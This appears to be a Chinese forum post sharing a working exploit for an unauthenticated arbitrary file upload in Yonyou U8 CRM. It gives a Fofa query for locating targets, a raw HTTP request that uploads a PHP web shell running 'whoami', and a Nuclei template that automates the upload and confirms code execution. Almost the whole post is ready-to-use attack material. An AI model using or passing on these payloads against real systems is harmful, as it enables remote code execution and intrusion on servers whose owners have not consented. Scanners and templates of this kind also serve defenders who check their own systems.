|
|
Fofa语法
title="用友U8CRM"
漏洞POC
POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855
------269520967239406871642430066855
Content-Disposition: form-data; name="file"; filename="1.php "
Content-Type: application/octet-stream
<?php system("whoami");unlink(__FILE__);?>
------269520967239406871642430066855
Content-Disposition: form-data; name="upload"
upload
------269520967239406871642430066855--
Nuclei
id: yonyou-crm-arbitrary-file-upload
info:
name: Yonyou CRM - Arbitrary File Upload
author: HK
severity: high
description: 用友CRM系统的uploadfile.php接口存在任意文件上传漏洞,攻击者可通过该漏洞上传任意文件。
metadata:
fofa-query: app="用友U8CRM"
tags: yonyou,crm,fileupload
http:
- raw:
- |
POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: {{Hostname}}
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarydRVCGWq4Cx3Sq6tt
------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
Content-Disposition: form-data; name="file"; filename="%s.php "
Content-Type: application/octet-stream
<?php print(1111*2222);unlink(__FILE__);?>
------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
Content-Disposition: form-data; name="upload"
upload
------WebKitFormBoundarydRVCGWq4Cx3Sq6tt--
- |
GET /tmpfile/{{uploadfile}} HTTP/1.1
Host: {{Hostname}}
extractors:
- type: regex
part: body
group: 1
name: uploadfile
regex:
- '(upd\w+\.tmp\.php)'
internal: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- '2468642'
- type: status
status:
- 200
|
|
发表于 2024-6-3 22:45:14